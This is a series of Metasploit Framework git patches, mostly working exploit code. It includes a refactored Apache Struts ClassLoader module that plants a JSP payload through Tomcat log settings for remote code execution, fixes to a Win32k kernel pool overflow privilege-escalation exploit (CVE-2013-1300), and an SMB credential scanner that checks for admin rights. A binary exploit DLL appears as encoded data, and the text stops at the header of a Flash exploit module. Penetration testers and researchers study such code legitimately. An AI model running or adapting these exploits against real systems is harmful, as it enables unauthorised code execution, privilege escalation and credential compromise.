'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], 'Platform' => %w{ linux win }, + 'Payload' => + { + 'Space' => 5000, + 'DisableNops' => true + }, 'Targets' => [ ['Java', @@ -60,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote ] ], 'DisclosureDate' => 'Mar 06 2014', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 1)) register_options( [ @@ -86,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote dropper end - def exec_cmd(uri, cmd = "") + def dump_line(uri, cmd = "") res = send_request_cgi({ 'uri' => uri+cmd, 'version' => '1.1', @@ -96,53 +101,45 @@ class Metasploit3 < Msf::Exploit::Remote res end - def is_log_flushed?(resp, content) - return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/ + def modify_class_loader(opts) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s), + 'version' => '1.1', + 'method' => 'GET', + 'vars_get' => { + "class['classLoader'].resources.context.parent.pipeline.first.directory" => opts[:directory], + "class['classLoader'].resources.context.parent.pipeline.first.prefix" => opts[:prefix], + "class['classLoader'].resources.context.parent.pipeline.first.suffix" => opts[:suffix], + "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format] + } + }) + + res end - def modify_class_loader - prefix_jsp = rand_text_alphanumeric(3+rand(3)) - date_format = rand_text_numeric(1+rand(4)) + def check_log_file(hint) + uri = normalize_uri("/", @jsp_file) - print_status("#{peer} - Modifying class loader") - - # Modifies classLoader parameters - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix" - - @jsp_file = prefix_jsp - @jsp_file << date_format - @jsp_file << ".jsp" - - # Wait till the log is created - uri = "/" - uri << @jsp_file - - created = false - - print_status("#{peer} - Waiting for the server to create the logfile") + print_status("#{peer} - Waiting for the server to flush the logfile") 10.times do |x| select(nil, nil, nil, 2) # Now make a request to trigger payload vprint_status("#{peer} - Countdown #{10-x}...") - res = exec_cmd(uri) + res = dump_line(uri) # Failure. The request timed out or the server went away. fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 - print_good("#{peer} - Log file created file at http://#{peer}/#{@jsp_file}") - created = true - break + if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/ + print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}") + return true end end - fail_with(Failure::TimeoutExpired, "#{peer} - No log file was created") unless created + false end # Fix the JSP payload to make it valid once is dropped @@ -163,57 +160,70 @@ class Metasploit3 < Msf::Exploit::Remote output end - def execute_jsp + def create_jsp if target['Arch'] == ARCH_JAVA jsp = fix(payload.encoded) - register_files_for_cleanup("#{@jsp_file}") else payload_exe = generate_payload_exe payload_file = rand_text_alphanumeric(4 + rand(4)) jsp = jsp_dropper(payload_file, payload_exe) - register_files_for_cleanup("#{payload_file}", "#{@jsp_file}") + register_files_for_cleanup(payload_file) end - # Inexistent URI that logs on previously created log file (with ".jsp" suffix) - hint = rand_text_alpha(4 + rand(4)) + jsp + end - print_status("#{peer} - Dumping payload into the logfile") - # Commands to be logged + def exploit + prefix_jsp = rand_text_alphanumeric(3+rand(3)) + date_format = rand_text_numeric(1+rand(4)) + @jsp_file = prefix_jsp + date_format + ".jsp" + + # Modify the Class Loader + + print_status("#{peer} - Modifying Class Loader...") + properties = { + :directory => 'webapps/ROOT', + :prefix => prefix_jsp, + :suffix => '.jsp', + :file_date_format => date_format + } + res = modify_class_loader(properties) + unless res + fail_with(Failure::TimeoutExpired, "#{peer} - No answer") + end + + # Check if the log file exists and hass been flushed + + if check_log_file(normalize_uri(target_uri.to_s)) + register_files_for_cleanup(@jsp_file) + else + fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed") + end + + # Prepare the JSP + print_status("#{peer} - Generating JSP...") + jsp = create_jsp + + # Dump the JSP to the log file + print_status("#{peer} - Dumping JSP into the logfile...") + random_request = rand_text_alphanumeric(3 + rand(3)) jsp.each_line do |l| - exec_cmd(hint, l.chomp) - end - - uri = "/" - uri << @jsp_file - - flushed = false - - print_status("#{peer} - Waiting for the server to flush the logfile") - - 10.times do |x| - select(nil, nil, nil, 2) - - # Now make a request to trigger payload - vprint_status("#{peer} - Countdown #{10-x}...") - res = exec_cmd(uri) - - # Failure. The request timed out or the server went away. - fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? - - # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 && is_log_flushed?(res, hint) - flushed = true - break + unless dump_line(random_request, l.chomp) + fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...") end end - fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed - end + # Check log file... enjoy shell! + check_log_file(random_request) - - def exploit - modify_class_loader - execute_jsp + # No matter what happened, try to 'restore' the Class Loader + properties = { + :directory => '', + :prefix => '', + :suffix => '', + :file_date_format => '' + } + modify_class_loader(properties) end end From b2eeaef47535e163c9d669a093dc657dfe3b1c6c Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Fri, 2 May 2014 06:16:21 -0500 Subject: [PATCH 232/853] Add admin check to smb_login The attached updates changes smb_login to detect if the newly discovered user is an administrator. It is based on code from Brandon McCann "zeknox" submitted in PR #1373, the associated changes, and the newer PR #2656. The changes should correct a few issues with PR #1373 and #2656 and address Redmine bug #8773. Specifically it: - Fixes the admin detection code by using simple.disconnect() instead of disconnect() - Adds support for detecting if the remote host will allow connects using any domain name when one of the new status codes is returned - Dealt with the issue in PR #2656 where the username was prefixed with a '\' Verification Be connected to a database Run this against a machine with a known user and admin user See that the admin user is reported correctly See that the non-admin user is reported correctly Check the output of creds Select a target that requires a domain in order to authenticate In the stored credentials, with CHECK_ADMIN enabled, see that the domain name is, in fact, preserved in the reporting To validate that the remote domain ignores domain value use the following command from a windows system: net use \\\admin$ /user:\ --- modules/auxiliary/scanner/smb/smb_login.rb | 41 +++++++++++++++++++--- 1 file changed, 37 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0d7daddb69..979b8817c3 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -32,7 +32,9 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'tebo ', # Original - 'Ben Campbell' # Refactoring + 'Ben Campbell', # Refactoring + 'Brandon McCann "zeknox" ', # admin check + 'Tom Sellers fadedcode.net>' # admin check/bug fix ], 'References' => [ @@ -69,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBPass', [ false, "SMB Password" ]), OptString.new('SMBUser', [ false, "SMB Username" ]), OptString.new('SMBDomain', [ false, "SMB Domain", '']), + OptBool.new('CHECK_ADMIN', [ false, "Check for Admin rights", false]), OptBool.new('PRESERVE_DOMAINS', [ false, "Respect a username that contains a domain name.", true]), OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false]) ], self.class) @@ -124,6 +127,27 @@ class Metasploit3 < Msf::Auxiliary # Windows SMB will return an error code during Session Setup, but nix Samba requires a Tree Connect: simple.connect("\\\\#{datastore['RHOST']}\\IPC$") status_code = 'STATUS_SUCCESS' + + if datastore['CHECK_ADMIN'] + status_code = :not_admin + # Drop the existing connection to IPC$ in order to connect to admin$ + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + begin + simple.connect("\\\\#{datastore['RHOST']}\\admin$") + status_code = :admin_access + # Restore the orginal connection + simple.disconnect("\\\\#{datastore['RHOST']}\\admin$") + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + rescue + status_code = :not_admin + ensure + begin + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + rescue ::Rex::Proto::SMB::Exceptions::NoReply + end + end + end + rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e status_code = e.get_error(e.error_code) rescue ::Rex::Proto::SMB::Exceptions::LoginError => e @@ -187,7 +211,16 @@ class Metasploit3 < Msf::Auxiliary end def valid_credentials?(status) - return (status == "STATUS_SUCCESS" || @correct_credentials_status_codes.include?(status)) + + case status + when 'STATUS_SUCCESS', :admin_access, :not_admin + return true + when *@correct_credentials_status_codes + return true + else + return false + end + end def try_user_pass(domain, user, pass) @@ -214,7 +247,7 @@ class Metasploit3 < Msf::Auxiliary output_message << " (#{smb_peer_os}) #{user} : #{pass} [#{status}]".gsub('%', '%%') case status - when 'STATUS_SUCCESS' + when 'STATUS_SUCCESS', :admin_access, :not_admin # Auth user indicates if the login was as a guest or not if(simple.client.auth_user) print_good(output_message % "SUCCESSFUL LOGIN") @@ -275,7 +308,7 @@ class Metasploit3 < Msf::Auxiliary def report_creds(domain,user,pass,active) login_name = "" - if accepts_bogus_domains?(user,pass,rhost) + if accepts_bogus_domains?(user,pass,rhost) || domain.blank? login_name = user else login_name = "#{domain}\\#{user}" From 850f6b02765c7dc6cb8225b8954a7b1df3677027 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 May 2014 13:33:55 +0100 Subject: [PATCH 233/853] Address OJ's comments --- .../source/exploits/cve-2013-1300/schlamperei/schlamperei.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c index 9b08be0379..c7fea10a62 100755 --- a/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c +++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c @@ -26,7 +26,7 @@ typedef NTSTATUS *PNTSTATUS; #define TABLE_BASE 0xff910000 -#define EXPLOIT_MSG 0xd +#define EXPLOIT_MSG WM_GETTEXT // global variables FTW HWND gHwnd = 0x0; @@ -231,7 +231,7 @@ typedef long (*_RtlCreateUserThread)(HANDLE, _RtlCreateUserThread RtlCreateUserThread; -int Schlamperei(LPVOID shellcode) +int Schlamperei() { // Create window which will execute the wndproc in kernel mode HWND wnd = createhelperwnd(); @@ -278,7 +278,7 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { } break; case DLL_PROCESS_ATTACH: - Schlamperei(lpReserved); + Schlamperei(); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: From 69915c0de545460442a4ee3c40e78f4b6b20a188 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 May 2014 14:17:27 +0100 Subject: [PATCH 234/853] Message correction --- modules/exploits/windows/local/ms13_053_schlamperei.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 1b8916b7b6..93748a9c31 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Local process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError - print_status("Operation failed. Trying to elevate the current process...") + print_status("Operation failed. Hosting exploit in the current process...") process = client.sys.process.open end From 56c5eac8234056105474fbbfc630914736f60fdc Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 May 2014 14:18:18 +0100 Subject: [PATCH 235/853] Message correction --- modules/exploits/windows/local/ms13_053_schlamperei.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 93748a9c31..48e9fa8da3 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection - + def initialize(info={}) super(update_info(info, { 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Description' => %q{ A kernel pool overflow in Win32k which allows local privilege escalation. - The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). + The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. From 06c8082187cbfa07eadf91d26d7a5c04204275db Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 May 2014 14:45:14 +0100 Subject: [PATCH 236/853] Use signed binary --- data/exploits/cve-2013-1300/schlamperei.dll | Bin 10240 -> 0 bytes .../cve-2013-1300/schlamperei.x86.dll | Bin 72192 -> 72192 bytes 2 files changed, 0 insertions(+), 0 deletions(-) delete mode 100644 data/exploits/cve-2013-1300/schlamperei.dll mode change 100755 => 100644 data/exploits/cve-2013-1300/schlamperei.x86.dll diff --git a/data/exploits/cve-2013-1300/schlamperei.dll b/data/exploits/cve-2013-1300/schlamperei.dll deleted file mode 100644 index 68b6fe9b1d42adbe5d8d66c83aa00676cbea8428..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 10240 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 delta 1093 zcmeIw%S%*I90%~<@7@{5#}q?Jj*n1lkv(wE70F4AYhW@EMKrT8GYfp6QK>CNEYQU) zOi3nAh_r}EEDKBN$Rw2{<-#^Lxd<06Tm+3V3?oDgHjI4-nsxs`2R@hc{GD^p?+nga z2Ink+xE|cvclY;ceZ%Ca=l7=NkiyI@1b#fiT3uZed!_WD3Dsn1=f> z4870_AVPAG?J@PH4ZK(wDIh(CA+W8jAy&U>Mv&!(GR9$Rp5=KCZv_2eFOwJ97Of#0W%aXhkEBv41f9F_z+^ouwi<;wQJXl=sG%HQF*7%}5jB9ATFA8N7f$N&HU From 36f9f342c1ec47fd3673c0ec8a9796055f3ffa24 Mon Sep 17 00:00:00 2001 From: julianvilas Date: Fri, 2 May 2014 16:26:08 +0200 Subject: [PATCH 237/853] Fix typo --- modules/exploits/multi/http/struts_code_exec_classloader.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index d44e390350..ee944aaeae 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Mark Thomas', # Vulnerability Discovery 'Przemyslaw Celej', # Vulnerability Discovery - 'pwntester ', # PoC 'Redsadic ' # Metasploit Module ], 'License' => MSF_LICENSE, @@ -192,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::TimeoutExpired, "#{peer} - No answer") end - # Check if the log file exists and hass been flushed + # Check if the log file exists and has been flushed if check_log_file(normalize_uri(target_uri.to_s)) register_files_for_cleanup(@jsp_file) From a47b88308321f0cd08526c92ba0369d4b81cef85 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Fri, 2 May 2014 12:46:50 -0500 Subject: [PATCH 238/853] Remove redundant simple.connect Remove redundant simple.connect. Thanks @jlee-r7 --- modules/auxiliary/scanner/smb/smb_login.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 979b8817c3..469922e012 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -135,9 +135,7 @@ class Metasploit3 < Msf::Auxiliary begin simple.connect("\\\\#{datastore['RHOST']}\\admin$") status_code = :admin_access - # Restore the orginal connection simple.disconnect("\\\\#{datastore['RHOST']}\\admin$") - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") rescue status_code = :not_admin ensure From 5b1a2073770472bbacacf00770e9021d62b4b5e1 Mon Sep 17 00:00:00 2001 From: Joshua Smith Date: Fri, 2 May 2014 19:52:58 -0400 Subject: [PATCH 239/853] cleans up numerous superfluous returns in msf/core/module --- lib/msf/core/module.rb | 82 ++++++++++++++++++------------------------ 1 file changed, 34 insertions(+), 48 deletions(-) diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index 170f8099dd..53fcd66ade 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -34,11 +34,11 @@ class Module end def fullname - return type + '/' + refname + type + '/' + refname end def shortname - return refname.split('/')[-1] + refname.split('/').last end # @@ -84,7 +84,7 @@ class Module # Returns the class reference to the framework # def framework - return self.class.framework + self.class.framework end # @@ -178,6 +178,7 @@ class Module # def print_prefix + ret = '' if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i ) @@ -189,10 +190,9 @@ class Module prefix << "[%04d] " % xn end - return prefix - else - return '' + ret = prefix end + ret end def print_status(msg='') @@ -257,7 +257,7 @@ class Module # payloads/windows/shell/reverse_tcp # def fullname - return self.class.fullname + self.class.fullname end # @@ -267,28 +267,28 @@ class Module # windows/shell/reverse_tcp # def refname - return self.class.refname + self.class.refname end # # Returns the module's rank. # def rank - return self.class.rank + self.class.rank end # # Returns the module's rank in string format. # def rank_to_s - return self.class.rank_to_s + self.class.rank_to_s end # # Returns the module's rank in display format. # def rank_to_h - return self.class.rank_to_h + self.class.rank_to_h end # @@ -299,14 +299,14 @@ class Module # reverse_tcp # def shortname - return self.class.shortname + self.class.shortname end # # Returns the unduplicated class associated with this module. # def orig_cls - return self.class.orig_cls + self.class.orig_cls end # @@ -366,30 +366,14 @@ class Module # Returns the address of the last target host (rough estimate) # def target_host - if(self.respond_to?('rhost')) - return rhost() - end - - if(self.datastore['RHOST']) - return self.datastore['RHOST'] - end - - nil + self.respond_to?('rhost') ? rhost : self.datastore['RHOST'] end # # Returns the address of the last target port (rough estimate) # def target_port - if(self.respond_to?('rport')) - return rport() - end - - if(self.datastore['RPORT']) - return self.datastore['RPORT'] - end - - nil + self.respond_to?('rport') ? rport : self.datastore['RPORT'] end # @@ -516,7 +500,7 @@ class Module # Return a comma separated list of author for this module. # def author_to_s - return author.collect { |author| author.to_s }.join(", ") + author.collect { |author| author.to_s }.join(", ") end # @@ -530,7 +514,7 @@ class Module # Return a comma separated list of supported architectures, if any. # def arch_to_s - return arch.join(", ") + arch.join(", ") end # @@ -544,16 +528,18 @@ class Module # Return whether or not the module supports the supplied architecture. # def arch?(what) - return true if (what == ARCH_ANY) - - return arch.index(what) != nil + if (what == ARCH_ANY) + true + else + arch.index(what) != nil + end end # # Return a comma separated list of supported platforms, if any. # def platform_to_s - return ((platform.all?) ? [ "All" ] : platform.names).join(", ") + platform.all? ? "All" : platform.names.join(", ") end # @@ -567,7 +553,7 @@ class Module # Returns whether or not the module requires or grants high privileges. # def privileged? - return (privileged == true) + privileged == true end # @@ -575,7 +561,7 @@ class Module # this somewhere else. # def comm - return Rex::Socket::Comm::Local + Rex::Socket::Comm::Local end # @@ -749,7 +735,7 @@ class Module # Constants indicating the reason for an unsuccessful module attempt # module Failure - + # # No confidence in success or failure # @@ -814,7 +800,7 @@ class Module # The payload was delivered but no session was opened (AV, network, etc) # PayloadFailed = 'payload-failed' - end + end ## @@ -827,42 +813,42 @@ class Module # Returns true if this module is an exploit module. # def exploit? - return (type == MODULE_EXPLOIT) + (type == MODULE_EXPLOIT) end # # Returns true if this module is a payload module. # def payload? - return (type == MODULE_PAYLOAD) + (type == MODULE_PAYLOAD) end # # Returns true if this module is an encoder module. # def encoder? - return (type == MODULE_ENCODER) + (type == MODULE_ENCODER) end # # Returns true if this module is a nop module. # def nop? - return (type == MODULE_NOP) + (type == MODULE_NOP) end # # Returns true if this module is an auxiliary module. # def auxiliary? - return (type == MODULE_AUX) + (type == MODULE_AUX) end # # Returns true if this module is an post-exploitation module. # def post? - return (type == MODULE_POST) + (type == MODULE_POST) end # @@ -1073,7 +1059,7 @@ protected merge_check_key(info, name, val) } - return info + info end # From b4c7c5ed1f335a8f9b5e66c1171c2e317b7a5488 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 3 May 2014 20:04:46 -0500 Subject: [PATCH 240/853] Add module for CVE-2014-0497 --- data/exploits/CVE-2014-0497/Vickers.swf | Bin 0 -> 3534 bytes .../source/exploits/CVE-2014-0497/Vickers.as | 797 ++++++++++++++++++ .../windows/browser/adobe_flash_avm2.rb | 132 +++ 3 files changed, 929 insertions(+) create mode 100755 data/exploits/CVE-2014-0497/Vickers.swf create mode 100755 external/source/exploits/CVE-2014-0497/Vickers.as create mode 100644 modules/exploits/windows/browser/adobe_flash_avm2.rb diff --git 